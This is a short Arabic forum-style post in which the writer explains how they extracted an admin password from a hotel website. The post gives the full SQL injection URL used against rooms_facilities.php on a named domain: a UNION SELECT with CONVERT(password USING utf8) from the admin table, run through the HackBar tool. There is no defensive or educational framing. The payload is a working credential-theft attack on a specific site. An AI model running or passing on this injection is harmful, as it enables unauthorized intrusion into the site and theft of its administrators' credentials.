السلام عليكم اخي
انا في الاستغلال شفرت الباسورد لان المبرمج الي برمج الموقع شفر الباس وانا شفرت كلمة password بالهاك بار
mysql
convert usin uff-8
وكان الاستغلال على الشكل التالي
http://www.pelagosbay.com/rooms_facilities.php
?id=-1+UNION+SELECT+1,2,CONVERT(password USING utf8),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+admin